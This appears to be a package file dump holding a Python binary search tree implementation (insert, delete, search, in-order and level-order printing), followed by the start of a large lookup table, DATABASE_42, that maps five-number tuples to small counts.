self.insert_node_recursive(self.root, val)
# Helper method for insert
def insert_node_recursive(self, current_node, new_node):
if new_node.data < current_node.data:
if current_node.left is None:
current_node.left = new_node
new_node.parent = current_node
else:
self.insert_node_recursive(current_node.left, new_node)
else:
if current_node.right is None:
current_node.right = new_node
new_node.parent = current_node
else:
self.insert_node_recursive(current_node.right, new_node)
# Delete the node with the given value
def delete(self, val):
node_to_delete = self.search(val)
if node_to_delete is None:
print("Node not found")
return
if node_to_delete.left is None and node_to_delete.right is None:
self.delete_leaf_node(node_to_delete)
elif node_to_delete.left is None:
self.delete_node_with_right_child(node_to_delete)
elif node_to_delete.right is None:
self.delete_node_with_left_child(node_to_delete)
else:
successor = self.get_successor(node_to_delete)
node_to_delete.data = successor.data
if successor.left is None and successor.right is None:
self.delete_leaf_node(successor)
else:
self.delete_node_with_right_child(successor)
# Deletes a leaf node from tree
def delete_leaf_node(self, node):
parent = node.parent
if parent is None:
self.root = None
elif parent.left == node:
parent.left = None
else:
parent.right = None
# Deletes a node with a left child from tree
def delete_node_with_left_child(self, node):
parent = node.parent
child = node.left
child.parent = parent
if parent is None:
self.root = child
elif parent.left == node:
parent.left = child
else:
parent.right = child
# Delets a node with a right child from tree
def delete_node_with_right_child(self, node):
parent = node.parent
child = node.right
child.parent = parent
if parent is None:
self.root = child
elif parent.left == node:
parent.left = child
else:
parent.right = child
# Helper method for delete
def get_successor(self, node):
successor = node.right
while successor.left is not None:
successor = successor.left
return successor
def search(self, val):
current = self.root
while current is not None:
if current.get_data() == val:
return current
elif val < current.get_data():
current = current.get_left()
else:
current = current.get_right()
return None
def printInOrder(self):
self._printInOrder(self.root)
print("\n")
def _printInOrder(self, node):
if node is not None:
self._printInOrder(node.left)
print(node.data, end=" ")
self._printInOrder(node.right)
def _get_depth(self, node):
if node is None:
return 0
return 1 + max(self._get_depth(node.left), self._get_depth(node.right))
def printBF(self):
depth = self._get_depth(self.root)
for i in range(1, depth+1):
self._print_level(self.root, i)
print()
print()
def _print_level(self, node, level):
if node is None:
return
if level == 1:
print(node.data, end=' ')
else:
self._print_level(node.left, level-1)
self._print_level(node.right, level-1) | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/trees/BST.py | BST.py |
DATABASE_42 = {
(0, 0, 0, 6, 7): 1,
(0, 0, 1, 3, 13): 1,
(0, 0, 1, 5, 7): 1,
(0, 0, 1, 6, 6): 1,
(0, 0, 1, 6, 7): 1,
(0, 0, 1, 6, 8): 1,
(0, 0, 1, 7, 7): 1,
(0, 0, 2, 3, 7): 1,
(0, 0, 2, 3, 12): 1,
(0, 0, 2, 4, 7): 1,
(0, 0, 2, 4, 10): 1,
(0, 0, 2, 4, 11): 1,
(0, 0, 2, 5, 6): 1,
(0, 0, 2, 5, 8): 1,
(0, 0, 2, 6, 7): 1,
(0, 0, 2, 6, 9): 1,
(0, 0, 2, 7, 8): 1,
(0, 0, 2, 7, 12): 1,
(0, 0, 2, 8, 13): 1,
(0, 0, 2, 9, 12): 1,
(0, 0, 2, 10, 11): 1,
(0, 0, 3, 3, 7): 1,
(0, 0, 3, 3, 11): 1,
(0, 0, 3, 3, 13): 1,
(0, 0, 3, 4, 6): 1,
(0, 0, 3, 4, 10): 1,
(0, 0, 3, 5, 9): 2,
(0, 0, 3, 6, 7): 1,
(0, 0, 3, 6, 8): 1,
(0, 0, 3, 6, 10): 1,
(0, 0, 3, 6, 12): 1,
(0, 0, 3, 7, 7): 1,
(0, 0, 3, 7, 9): 1,
(0, 0, 3, 9, 11): 1,
(0, 0, 3, 10, 12): 1,
(0, 0, 4, 6, 7): 1,
(0, 0, 4, 6, 9): 1,
(0, 0, 4, 6, 11): 1,
(0, 0, 4, 6, 12): 1,
(0, 0, 4, 7, 10): 1,
(0, 0, 4, 8, 10): 1,
(0, 0, 4, 10, 13): 1,
(0, 0, 5, 6, 7): 1,
(0, 0, 5, 6, 12): 2,
(0, 0, 5, 7, 7): 1,
(0, 0, 5, 7, 11): 1,
(0, 0, 5, 8, 10): 1,
(0, 0, 5, 11, 13): 1,
(0, 0, 6, 6, 6): 1,
(0, 0, 6, 6, 7): 1,
(0, 0, 6, 6, 8): 1,
(0, 0, 6, 6, 13): 1,
(0, 0, 6, 7, 7): 1,
(0, 0, 6, 7, 8): 1,
(0, 0, 6, 7, 9): 1,
(0, 0, 6, 7, 10): 1,
(0, 0, 6, 7, 11): 1,
(0, 0, 6, 7, 12): 2,
(0, 0, 6, 7, 13): 1,
(0, 0, 6, 9, 12): 1,
(0, 0, 7, 7, 7): 1,
(0, 0, 7, 7, 13): 1,
(0, 1, 1, 2, 13): 1,
(0, 1, 1, 3, 7): 1,
(0, 1, 1, 3, 12): 1,
(0, 1, 1, 3, 13): 1,
(0, 1, 1, 4, 7): 1,
(0, 1, 1, 4, 10): 1,
(0, 1, 1, 4, 11): 1,
(0, 1, 1, 4, 13): 1,
(0, 1, 1, 5, 6): 2,
(0, 1, 1, 5, 7): 1,
(0, 1, 1, 5, 8): 2,
(0, 1, 1, 6, 6): 1,
(0, 1, 1, 6, 7): 2,
(0, 1, 1, 6, 8): 1,
(0, 1, 1, 6, 9): 1,
(0, 1, 1, 7, 7): 1,
(0, 1, 1, 7, 8): 2,
(0, 1, 1, 7, 12): 1,
(0, 1, 1, 8, 13): 1,
(0, 1, 1, 9, 12): 1,
(0, 1, 1, 10, 11): 1,
(0, 1, 2, 2, 7): 1,
(0, 1, 2, 2, 10): 1,
(0, 1, 2, 2, 11): 1,
(0, 1, 2, 2, 12): 1,
(0, 1, 2, 3, 6): 2,
(0, 1, 2, 3, 7): 2,
(0, 1, 2, 3, 8): 1,
(0, 1, 2, 3, 10): 1,
(0, 1, 2, 3, 11): 3,
(0, 1, 2, 3, 12): 2,
(0, 1, 2, 3, 13): 4,
(0, 1, 2, 4, 5): 1,
(0, 1, 2, 4, 6): 3,
(0, 1, 2, 4, 7): 2,
(0, 1, 2, 4, 8): 2,
(0, 1, 2, 4, 9): 1,
(0, 1, 2, 4, 10): 4,
(0, 1, 2, 4, 11): 3,
(0, 1, 2, 4, 12): 3,
(0, 1, 2, 5, 5): 1,
(0, 1, 2, 5, 6): 1,
(0, 1, 2, 5, 7): 4,
(0, 1, 2, 5, 8): 1,
(0, 1, 2, 5, 9): 4,
(0, 1, 2, 5, 10): 1,
(0, 1, 2, 5, 11): 1,
(0, 1, 2, 5, 12): 1,
(0, 1, 2, 5, 13): 1,
(0, 1, 2, 6, 6): 2,
(0, 1, 2, 6, 7): 1,
(0, 1, 2, 6, 8): 5,
(0, 1, 2, 6, 9): 1,
(0, 1, 2, 6, 10): 1,
(0, 1, 2, 6, 12): 3,
(0, 1, 2, 6, 13): 1,
(0, 1, 2, 7, 7): 3,
(0, 1, 2, 7, 8): 1,
(0, 1, 2, 7, 9): 2,
(0, 1, 2, 7, 10): 1,
(0, 1, 2, 7, 11): 1,
(0, 1, 2, 7, 12): 1,
(0, 1, 2, 7, 13): 2,
(0, 1, 2, 8, 8): 1,
(0, 1, 2, 8, 12): 2,
(0, 1, 2, 8, 13): 1,
(0, 1, 2, 9, 11): 2,
(0, 1, 2, 9, 12): 2,
(0, 1, 2, 9, 13): 1,
(0, 1, 2, 10, 10): 1,
(0, 1, 2, 10, 11): 1,
(0, 1, 2, 10, 12): 2,
(0, 1, 2, 11, 11): 1,
(0, 1, 3, 3, 5): 1,
(0, 1, 3, 3, 6): 2,
(0, 1, 3, 3, 7): 2,
(0, 1, 3, 3, 8): 1,
(0, 1, 3, 3, 10): 1,
(0, 1, 3, 3, 11): 1,
(0, 1, 3, 3, 12): 2,
(0, 1, 3, 3, 13): 1,
(0, 1, 3, 4, 5): 1,
(0, 1, 3, 4, 6): 1,
(0, 1, 3, 4, 7): 2,
(0, 1, 3, 4, 9): 2,
(0, 1, 3, 4, 10): 2,
(0, 1, 3, 4, 11): 3,
(0, 1, 3, 4, 13): 3,
(0, 1, 3, 5, 6): 1,
(0, 1, 3, 5, 7): 1,
(0, 1, 3, 5, 8): 3,
(0, 1, 3, 5, 9): 3,
(0, 1, 3, 5, 10): 3,
(0, 1, 3, 5, 12): 1,
(0, 1, 3, 5, 13): 1,
(0, 1, 3, 6, 6): 1,
(0, 1, 3, 6, 7): 2,
(0, 1, 3, 6, 8): 2,
(0, 1, 3, 6, 9): 5,
(0, 1, 3, 6, 10): 1,
(0, 1, 3, 6, 11): 2,
(0, 1, 3, 6, 12): 2,
(0, 1, 3, 6, 13): 3,
(0, 1, 3, 7, 7): 2,
(0, 1, 3, 7, 8): 2,
(0, 1, 3, 7, 9): 1,
(0, 1, 3, 7, 10): 2,
(0, 1, 3, 7, 12): 2,
(0, 1, 3, 7, 13): 1,
(0, 1, 3, 8, 9): 1,
(0, 1, 3, 8, 10): 1,
(0, 1, 3, 8, 11): 1,
(0, 1, 3, 8, 13): 2,
(0, 1, 3, 9, 10): 1,
(0, 1, 3, 9, 11): 2,
(0, 1, 3, 9, 12): 3,
(0, 1, 3, 9, 13): 2,
(0, 1, 3, 10, 11): 3,
(0, 1, 3, 10, 12): 1,
(0, 1, 3, 10, 13): 3,
(0, 1, 3, 11, 12): 1,
(0, 1, 3, 11, 13): 1,
(0, 1, 3, 12, 13): 1,
(0, 1, 3, 13, 13): 1,
(0, 1, 4, 4, 6): 1,
(0, 1, 4, 4, 10): 1,
(0, 1, 4, 5, 7): 1,
(0, 1, 4, 5, 8): 1,
(0, 1, 4, 5, 9): 3,
(0, 1, 4, 5, 10): 1,
(0, 1, 4, 5, 11): 1,
(0, 1, 4, 5, 12): 1,
(0, 1, 4, 6, 6): 1,
(0, 1, 4, 6, 7): 1,
(0, 1, 4, 6, 8): 3,
(0, 1, 4, 6, 9): 1,
(0, 1, 4, 6, 10): 3,
(0, 1, 4, 6, 11): 2,
(0, 1, 4, 6, 12): 4,
(0, 1, 4, 6, 13): 1,
(0, 1, 4, 7, 7): 3,
(0, 1, 4, 7, 9): 2,
(0, 1, 4, 7, 10): 2,
(0, 1, 4, 7, 11): 2,
(0, 1, 4, 7, 12): 1,
(0, 1, 4, 7, 13): 2,
(0, 1, 4, 8, 9): 1,
(0, 1, 4, 8, 10): 3,
(0, 1, 4, 8, 11): 1,
(0, 1, 4, 9, 10): 1,
(0, 1, 4, 9, 11): 1,
(0, 1, 4, 9, 13): 1,
(0, 1, 4, 10, 12): 3,
(0, 1, 4, 10, 13): 1,
(0, 1, 4, 11, 13): 2,
(0, 1, 4, 12, 13): 1,
(0, 1, 4, 13, 13): 1,
(0, 1, 5, 5, 7): 1,
(0, 1, 5, 5, 12): 2,
(0, 1, 5, 6, 6): 3,
(0, 1, 5, 6, 7): 5,
(0, 1, 5, 6, 8): 3,
(0, 1, 5, 6, 9): 1,
(0, 1, 5, 6, 11): 3,
(0, 1, 5, 6, 12): 3,
(0, 1, 5, 6, 13): 3,
(0, 1, 5, 7, 7): 2,
(0, 1, 5, 7, 8): 3,
(0, 1, 5, 7, 9): 1,
(0, 1, 5, 7, 10): 3,
(0, 1, 5, 7, 11): 2,
(0, 1, 5, 7, 12): 5,
(0, 1, 5, 7, 13): 1,
(0, 1, 5, 8, 9): 1,
(0, 1, 5, 8, 10): 2,
(0, 1, 5, 8, 11): 2,
(0, 1, 5, 8, 13): 1,
(0, 1, 5, 9, 10): 1,
(0, 1, 5, 9, 12): 1,
(0, 1, 5, 10, 13): 2,
(0, 1, 5, 11, 12): 1,
(0, 1, 5, 11, 13): 1,
(0, 1, 5, 12, 13): 1,
(0, 1, 6, 6, 6): 1,
(0, 1, 6, 6, 7): 4,
(0, 1, 6, 6, 8): 2,
(0, 1, 6, 6, 9): 2,
(0, 1, 6, 6, 10): 1,
(0, 1, 6, 6, 11): 1,
(0, 1, 6, 6, 12): 4,
(0, 1, 6, 6, 13): 2,
(0, 1, 6, 7, 7): 4,
(0, 1, 6, 7, 8): 5,
(0, 1, 6, 7, 9): 1,
(0, 1, 6, 7, 10): 1,
(0, 1, 6, 7, 11): 2,
(0, 1, 6, 7, 12): 2,
(0, 1, 6, 7, 13): 5,
(0, 1, 6, 8, 8): 1,
(0, 1, 6, 8, 9): 1,
(0, 1, 6, 8, 10): 2,
(0, 1, 6, 8, 11): 1,
(0, 1, 6, 8, 12): 3,
(0, 1, 6, 8, 13): 1,
(0, 1, 6, 9, 11): 1,
(0, 1, 6, 9, 12): 1,
(0, 1, 6, 9, 13): 2,
(0, 1, 6, 10, 12): 1,
(0, 1, 6, 11, 13): 1,
(0, 1, 7, 7, 7): 1,
(0, 1, 7, 7, 8): 3,
(0, 1, 7, 7, 9): 1,
(0, 1, 7, 7, 10): 1,
(0, 1, 7, 7, 11): 1,
(0, 1, 7, 7, 12): 2,
(0, 1, 7, 7, 13): 2,
(0, 1, 7, 8, 13): 3,
(0, 1, 7, 9, 12): 2,
(0, 1, 7, 10, 12): 1,
(0, 1, 7, 10, 13): 1,
(0, 1, 8, 11, 13): 1,
(0, 1, 9, 12, 13): 1,
(0, 1, 10, 13, 13): 1,
(0, 2, 2, 2, 7): 2,
(0, 2, 2, 2, 10): 2,
(0, 2, 2, 2, 11): 2,
(0, 2, 2, 3, 5): 1,
(0, 2, 2, 3, 6): 3,
(0, 2, 2, 3, 7): 1,
(0, 2, 2, 3, 8): 2,
(0, 2, 2, 3, 9): 2,
(0, 2, 2, 3, 10): 2,
(0, 2, 2, 3, 12): 3,
(0, 2, 2, 3, 13): 1,
(0, 2, 2, 4, 5): 2,
(0, 2, 2, 4, 7): 2,
(0, 2, 2, 4, 8): 1,
(0, 2, 2, 4, 9): 2,
(0, 2, 2, 4, 10): 1,
(0, 2, 2, 4, 11): 1,
(0, 2, 2, 4, 12): 1,
(0, 2, 2, 4, 13): 2,
(0, 2, 2, 5, 6): 2,
(0, 2, 2, 5, 7): 2,
(0, 2, 2, 5, 8): 3,
(0, 2, 2, 5, 10): 1,
(0, 2, 2, 5, 11): 1,
(0, 2, 2, 5, 12): 2,
(0, 2, 2, 5, 13): 1,
(0, 2, 2, 6, 6): 1,
(0, 2, 2, 6, 7): 1,
(0, 2, 2, 6, 8): 1,
(0, 2, 2, 6, 9): 4,
(0, 2, 2, 6, 10): 2,
(0, 2, 2, 6, 11): 3,
(0, 2, 2, 6, 12): 3,
(0, 2, 2, 6, 13): 1,
(0, 2, 2, 7, 7): 2,
(0, 2, 2, 7, 8): 3,
(0, 2, 2, 7, 10): 3,
(0, 2, 2, 7, 12): 2,
(0, 2, 2, 7, 13): 1,
(0, 2, 2, 8, 9): 1,
(0, 2, 2, 8, 10): 3,
(0, 2, 2, 8, 11): 2,
(0, 2, 2, 8, 12): 1,
(0, 2, 2, 8, 13): 1,
(0, 2, 2, 9, 10): 1,
(0, 2, 2, 9, 11): 1,
(0, 2, 2, 9, 12): 2,
(0, 2, 2, 9, 13): 1,
(0, 2, 2, 10, 10): 1,
(0, 2, 2, 10, 11): 1,
(0, 2, 2, 10, 12): 1,
(0, 2, 2, 10, 13): 3,
(0, 2, 2, 11, 11): 1,
(0, 2, 2, 11, 12): 2,
(0, 2, 2, 12, 13): 1,
(0, 2, 3, 3, 4): 2,
(0, 2, 3, 3, 5): 1,
(0, 2, 3, 3, 6): 2,
(0, 2, 3, 3, 7): 2,
(0, 2, 3, 3, 8): 2,
(0, 2, 3, 3, 9): 3,
(0, 2, 3, 3, 10): 1,
(0, 2, 3, 3, 11): 2,
(0, 2, 3, 3, 12): 2,
(0, 2, 3, 3, 13): 3,
(0, 2, 3, 4, 4): 2,
(0, 2, 3, 4, 5): 1,
(0, 2, 3, 4, 6): 3,
(0, 2, 3, 4, 7): 5,
(0, 2, 3, 4, 8): 3,
(0, 2, 3, 4, 9): 5,
(0, 2, 3, 4, 10): 3,
(0, 2, 3, 4, 11): 2,
(0, 2, 3, 4, 12): 8,
(0, 2, 3, 4, 13): 1,
(0, 2, 3, 5, 5): 1,
(0, 2, 3, 5, 6): 3,
(0, 2, 3, 5, 7): 4,
(0, 2, 3, 5, 8): 1,
(0, 2, 3, 5, 9): 3,
(0, 2, 3, 5, 11): 4,
(0, 2, 3, 5, 12): 4,
(0, 2, 3, 5, 13): 3,
(0, 2, 3, 6, 6): 4,
(0, 2, 3, 6, 7): 4,
(0, 2, 3, 6, 8): 5,
(0, 2, 3, 6, 9): 2,
(0, 2, 3, 6, 10): 5,
(0, 2, 3, 6, 11): 2,
(0, 2, 3, 6, 12): 7,
(0, 2, 3, 6, 13): 4,
(0, 2, 3, 7, 7): 4,
(0, 2, 3, 7, 8): 2,
(0, 2, 3, 7, 9): 6,
(0, 2, 3, 7, 10): 2,
(0, 2, 3, 7, 11): 5,
(0, 2, 3, 7, 12): 5,
(0, 2, 3, 7, 13): 1,
(0, 2, 3, 8, 8): 2,
(0, 2, 3, 8, 9): 2,
(0, 2, 3, 8, 10): 4,
(0, 2, 3, 8, 11): 1,
(0, 2, 3, 8, 12): 4,
(0, 2, 3, 8, 13): 1,
(0, 2, 3, 9, 9): 4,
(0, 2, 3, 9, 10): 3,
(0, 2, 3, 9, 11): 1,
(0, 2, 3, 9, 12): 4,
(0, 2, 3, 9, 13): 2,
(0, 2, 3, 10, 10): 1,
(0, 2, 3, 10, 11): 1,
(0, 2, 3, 10, 12): 5,
(0, 2, 3, 10, 13): 1,
(0, 2, 3, 11, 11): 1,
(0, 2, 3, 11, 12): 3,
(0, 2, 3, 11, 13): 2,
(0, 2, 3, 12, 12): 5,
(0, 2, 3, 12, 13): 3,
(0, 2, 3, 13, 13): 1,
(0, 2, 4, 4, 5): 2,
(0, 2, 4, 4, 6): 1,
(0, 2, 4, 4, 7): 4,
(0, 2, 4, 4, 9): 1,
(0, 2, 4, 4, 10): 4,
(0, 2, 4, 4, 11): 4,
(0, 2, 4, 4, 12): 2,
(0, 2, 4, 4, 13): 3,
(0, 2, 4, 5, 5): 2,
(0, 2, 4, 5, 6): 4,
(0, 2, 4, 5, 7): 2,
(0, 2, 4, 5, 8): 5,
(0, 2, 4, 5, 10): 4,
(0, 2, 4, 5, 11): 3,
(0, 2, 4, 5, 12): 4,
(0, 2, 4, 5, 13): 2,
(0, 2, 4, 6, 6): 4,
(0, 2, 4, 6, 7): 3,
(0, 2, 4, 6, 8): 2,
(0, 2, 4, 6, 9): 6,
(0, 2, 4, 6, 10): 4,
(0, 2, 4, 6, 11): 4,
(0, 2, 4, 6, 12): 2,
(0, 2, 4, 6, 13): 3,
(0, 2, 4, 7, 7): 4,
(0, 2, 4, 7, 8): 5,
(0, 2, 4, 7, 9): 1,
(0, 2, 4, 7, 10): 4,
(0, 2, 4, 7, 11): 2,
(0, 2, 4, 7, 12): 8,
(0, 2, 4, 7, 13): 1,
(0, 2, 4, 8, 8): 1,
(0, 2, 4, 8, 9): 3,
(0, 2, 4, 8, 10): 4,
(0, 2, 4, 8, 11): 6,
(0, 2, 4, 8, 12): 2,
(0, 2, 4, 8, 13): 6,
(0, 2, 4, 9, 10): 3,
(0, 2, 4, 9, 11): 1,
(0, 2, 4, 9, 12): 5,
(0, 2, 4, 10, 10): 2,
(0, 2, 4, 10, 11): 6,
(0, 2, 4, 10, 12): 2,
(0, 2, 4, 10, 13): 3,
(0, 2, 4, 11, 11): 1,
(0, 2, 4, 11, 12): 4,
(0, 2, 4, 11, 13): 1,
(0, 2, 4, 12, 12): 2,
(0, 2, 4, 12, 13): 3,
(0, 2, 5, 5, 6): 1,
(0, 2, 5, 5, 7): 2,
(0, 2, 5, 5, 8): 2,
(0, 2, 5, 5, 9): 2,
(0, 2, 5, 5, 11): 2,
(0, 2, 5, 5, 13): 1,
(0, 2, 5, 6, 6): 2,
(0, 2, 5, 6, 7): 2,
(0, 2, 5, 6, 8): 3,
(0, 2, 5, 6, 9): 6,
(0, 2, 5, 6, 10): 5,
(0, 2, 5, 6, 11): 1,
(0, 2, 5, 6, 12): 6,
(0, 2, 5, 6, 13): 2,
(0, 2, 5, 7, 7): 5,
(0, 2, 5, 7, 8): 3,
(0, 2, 5, 7, 9): 4,
(0, 2, 5, 7, 11): 1,
(0, 2, 5, 7, 12): 1,
(0, 2, 5, 7, 13): 2,
(0, 2, 5, 8, 8): 3,
(0, 2, 5, 8, 9): 1,
(0, 2, 5, 8, 10): 3,
(0, 2, 5, 8, 11): 1,
(0, 2, 5, 8, 12): 6,
(0, 2, 5, 8, 13): 2,
(0, 2, 5, 9, 10): 1,
(0, 2, 5, 9, 11): 3,
(0, 2, 5, 9, 12): 2,
(0, 2, 5, 9, 13): 1,
(0, 2, 5, 10, 10): 1,
(0, 2, 5, 10, 11): 3,
(0, 2, 5, 10, 12): 2,
(0, 2, 5, 11, 11): 1,
(0, 2, 5, 11, 13): 2,
(0, 2, 5, 12, 12): 2,
(0, 2, 5, 12, 13): 1,
(0, 2, 5, 13, 13): 2,
(0, 2, 6, 6, 6): 2,
(0, 2, 6, 6, 7): 3,
(0, 2, 6, 6, 8): 4,
(0, 2, 6, 6, 9): 3,
(0, 2, 6, 6, 10): 2,
(0, 2, 6, 6, 11): 1,
(0, 2, 6, 6, 12): 4,
(0, 2, 6, 6, 13): 2,
(0, 2, 6, 7, 7): 3,
(0, 2, 6, 7, 8): 3,
(0, 2, 6, 7, 9): 4,
(0, 2, 6, 7, 10): 2,
(0, 2, 6, 7, 11): 3,
(0, 2, 6, 7, 12): 6,
(0, 2, 6, 7, 13): 3,
(0, 2, 6, 8, 8): 2,
(0, 2, 6, 8, 9): 3,
(0, 2, 6, 8, 10): 2,
(0, 2, 6, 8, 11): 3,
(0, 2, 6, 8, 12): 2,
(0, 2, 6, 8, 13): 3,
(0, 2, 6, 9, 9): 2,
(0, 2, 6, 9, 10): 4,
(0, 2, 6, 9, 11): 3,
(0, 2, 6, 9, 12): 7,
(0, 2, 6, 9, 13): 1,
(0, 2, 6, 10, 10): 2,
(0, 2, 6, 10, 11): 2,
(0, 2, 6, 10, 12): 2,
(0, 2, 6, 10, 13): 3,
(0, 2, 6, 11, 12): 2,
(0, 2, 6, 11, 13): 1,
(0, 2, 6, 12, 12): 3,
(0, 2, 6, 12, 13): 2,
(0, 2, 7, 7, 7): 3,
(0, 2, 7, 7, 8): 2,
(0, 2, 7, 7, 9): 2,
(0, 2, 7, 7, 10): 2,
(0, 2, 7, 7, 11): 2,
(0, 2, 7, 7, 12): 2,
(0, 2, 7, 7, 13): 2,
(0, 2, 7, 8, 8): 1,
(0, 2, 7, 8, 9): 1,
(0, 2, 7, 8, 10): 5,
(0, 2, 7, 8, 11): 2,
(0, 2, 7, 8, 12): 6,
(0, 2, 7, 8, 13): 2,
(0, 2, 7, 9, 10): 1,
(0, 2, 7, 9, 12): 4,
(0, 2, 7, 9, 13): 3,
(0, 2, 7, 10, 11): 3,
(0, 2, 7, 10, 12): 2,
(0, 2, 7, 10, 13): 1,
(0, 2, 7, 11, 11): 1,
(0, 2, 7, 11, 12): 2,
(0, 2, 7, 11, 13): 2,
(0, 2, 7, 12, 12): 3,
(0, 2, 7, 12, 13): 1,
(0, 2, 8, 8, 9): 1,
(0, 2, 8, 8, 10): 2,
(0, 2, 8, 8, 11): 1,
(0, 2, 8, 8, 13): 3,
(0, 2, 8, 9, 12): 4,
(0, 2, 8, 9, 13): 1,
(0, 2, 8, 10, 10): 1,
(0, 2, 8, 10, 11): 1,
(0, 2, 8, 10, 12): 2,
(0, 2, 8, 10, 13): 2,
(0, 2, 8, 11, 12): 3,
(0, 2, 8, 11, 13): 1,
(0, 2, 8, 12, 12): 2,
(0, 2, 8, 12, 13): 2,
(0, 2, 8, 13, 13): 2,
(0, 2, 9, 9, 12): 2,
(0, 2, 9, 10, 11): 1,
(0, 2, 9, 10, 12): 1,
(0, 2, 9, 10, 13): 2,
(0, 2, 9, 11, 11): 1,
(0, 2, 9, 11, 12): 2,
(0, 2, 9, 11, 13): 2,
(0, 2, 9, 12, 12): 4,
(0, 2, 9, 12, 13): 1,
(0, 2, 10, 10, 11): 2,
(0, 2, 10, 10, 12): 1,
(0, 2, 10, 11, 11): 2,
(0, 2, 10, 11, 12): 1,
(0, 2, 10, 11, 13): 2,
(0, 2, 10, 12, 13): 2,
(0, 2, 10, 13, 13): 1,
(0, 3, 3, 3, 4): 1,
(0, 3, 3, 3, 5): 2,
(0, 3, 3, 3, 7): 2,
(0, 3, 3, 3, 8): 1,
(0, 3, 3, 3, 10): 2,
(0, 3, 3, 3, 11): 1,
(0, 3, 3, 3, 12): 2,
(0, 3, 3, 3, 13): 1,
(0, 3, 3, 4, 6): 3,
(0, 3, 3, 4, 7): 2,
(0, 3, 3, 4, 9): 3,
(0, 3, 3, 4, 10): 1,
(0, 3, 3, 4, 11): 3,
(0, 3, 3, 4, 12): 1,
(0, 3, 3, 4, 13): 2,
(0, 3, 3, 5, 6): 2,
(0, 3, 3, 5, 7): 3,
(0, 3, 3, 5, 8): 1,
(0, 3, 3, 5, 9): 3,
(0, 3, 3, 5, 10): 1,
(0, 3, 3, 5, 11): 1,
(0, 3, 3, 5, 12): 4,
(0, 3, 3, 5, 13): 1,
(0, 3, 3, 6, 6): 3,
(0, 3, 3, 6, 7): 3,
(0, 3, 3, 6, 8): 4,
(0, 3, 3, 6, 9): 2,
(0, 3, 3, 6, 10): 1,
(0, 3, 3, 6, 11): 4,
(0, 3, 3, 6, 12): 4,
(0, 3, 3, 6, 13): 6,
(0, 3, 3, 7, 7): 3,
(0, 3, 3, 7, 8): 2,
(0, 3, 3, 7, 9): 3,
(0, 3, 3, 7, 10): 2,
(0, 3, 3, 7, 11): 2,
(0, 3, 3, 7, 12): 3,
(0, 3, 3, 7, 13): 2,
(0, 3, 3, 8, 9): 3,
(0, 3, 3, 8, 10): 1,
(0, 3, 3, 8, 11): 1,
(0, 3, 3, 8, 13): 1,
(0, 3, 3, 9, 10): 2,
(0, 3, 3, 9, 11): 3,
(0, 3, 3, 9, 12): 3,
(0, 3, 3, 9, 13): 4,
(0, 3, 3, 10, 11): 1,
(0, 3, 3, 10, 12): 1,
(0, 3, 3, 10, 13): 1,
(0, 3, 3, 11, 11): 1,
(0, 3, 3, 11, 12): 2,
(0, 3, 3, 11, 13): 2,
(0, 3, 3, 12, 13): 2,
(0, 3, 3, 13, 13): 1,
(0, 3, 4, 4, 6): 3,
(0, 3, 4, 4, 10): 2,
(0, 3, 4, 4, 13): 1,
(0, 3, 4, 5, 5): 2,
(0, 3, 4, 5, 6): 4,
(0, 3, 4, 5, 7): 3,
(0, 3, 4, 5, 9): 2,
(0, 3, 4, 5, 10): 3,
(0, 3, 4, 5, 11): 3,
(0, 3, 4, 5, 13): 2,
(0, 3, 4, 6, 6): 3,
(0, 3, 4, 6, 7): 5,
(0, 3, 4, 6, 8): 5,
(0, 3, 4, 6, 9): 6,
(0, 3, 4, 6, 10): 7,
(0, 3, 4, 6, 11): 4,
(0, 3, 4, 6, 12): 9,
(0, 3, 4, 6, 13): 1,
(0, 3, 4, 7, 7): 4,
(0, 3, 4, 7, 8): 2,
(0, 3, 4, 7, 9): 2,
(0, 3, 4, 7, 10): 2,
(0, 3, 4, 7, 11): 3,
(0, 3, 4, 7, 12): 1,
(0, 3, 4, 7, 13): 5,
(0, 3, 4, 8, 9): 1,
(0, 3, 4, 8, 10): 4,
(0, 3, 4, 8, 12): 2,
(0, 3, 4, 8, 13): 1,
(0, 3, 4, 9, 9): 3,
(0, 3, 4, 9, 10): 2,
(0, 3, 4, 9, 11): 3,
(0, 3, 4, 9, 12): 1,
(0, 3, 4, 9, 13): 1,
(0, 3, 4, 10, 10): 3,
(0, 3, 4, 10, 11): 2,
(0, 3, 4, 10, 12): 3,
(0, 3, 4, 10, 13): 3,
(0, 3, 4, 11, 12): 2,
(0, 3, 4, 11, 13): 1,
(0, 3, 4, 12, 13): 2,
(0, 3, 4, 13, 13): 1,
(0, 3, 5, 5, 6): 1,
(0, 3, 5, 5, 8): 1,
(0, 3, 5, 5, 9): 2,
(0, 3, 5, 5, 10): 1,
(0, 3, 5, 5, 11): 1,
(0, 3, 5, 5, 12): 1,
(0, 3, 5, 5, 13): 1,
(0, 3, 5, 6, 6): 2,
(0, 3, 5, 6, 7): 2,
(0, 3, 5, 6, 8): 3,
(0, 3, 5, 6, 9): 7,
(0, 3, 5, 6, 10): 2,
(0, 3, 5, 6, 11): 1,
(0, 3, 5, 6, 12): 4,
(0, 3, 5, 6, 13): 1,
(0, 3, 5, 7, 7): 3,
(0, 3, 5, 7, 8): 2,
(0, 3, 5, 7, 9): 4,
(0, 3, 5, 7, 10): 4,
(0, 3, 5, 7, 11): 1,
(0, 3, 5, 7, 12): 2,
(0, 3, 5, 7, 13): 1,
(0, 3, 5, 8, 9): 2,
(0, 3, 5, 8, 10): 1,
(0, 3, 5, 8, 11): 2,
(0, 3, 5, 8, 12): 1,
(0, 3, 5, 8, 13): 6,
(0, 3, 5, 9, 9): 4,
(0, 3, 5, 9, 10): 5,
(0, 3, 5, 9, 11): 3,
(0, 3, 5, 9, 12): 6,
(0, 3, 5, 9, 13): 2,
(0, 3, 5, 10, 11): 4,
(0, 3, 5, 10, 12): 3,
(0, 3, 5, 11, 11): 1,
(0, 3, 5, 11, 12): 1,
(0, 3, 5, 11, 13): 1,
(0, 3, 5, 12, 13): 1,
(0, 3, 6, 6, 6): 2,
(0, 3, 6, 6, 7): 1,
(0, 3, 6, 6, 8): 3,
(0, 3, 6, 6, 9): 3,
(0, 3, 6, 6, 10): 4,
(0, 3, 6, 6, 11): 2,
(0, 3, 6, 6, 12): 3,
(0, 3, 6, 6, 13): 2,
(0, 3, 6, 7, 7): 3,
(0, 3, 6, 7, 8): 4,
(0, 3, 6, 7, 9): 5,
(0, 3, 6, 7, 10): 2,
(0, 3, 6, 7, 11): 2,
(0, 3, 6, 7, 12): 7,
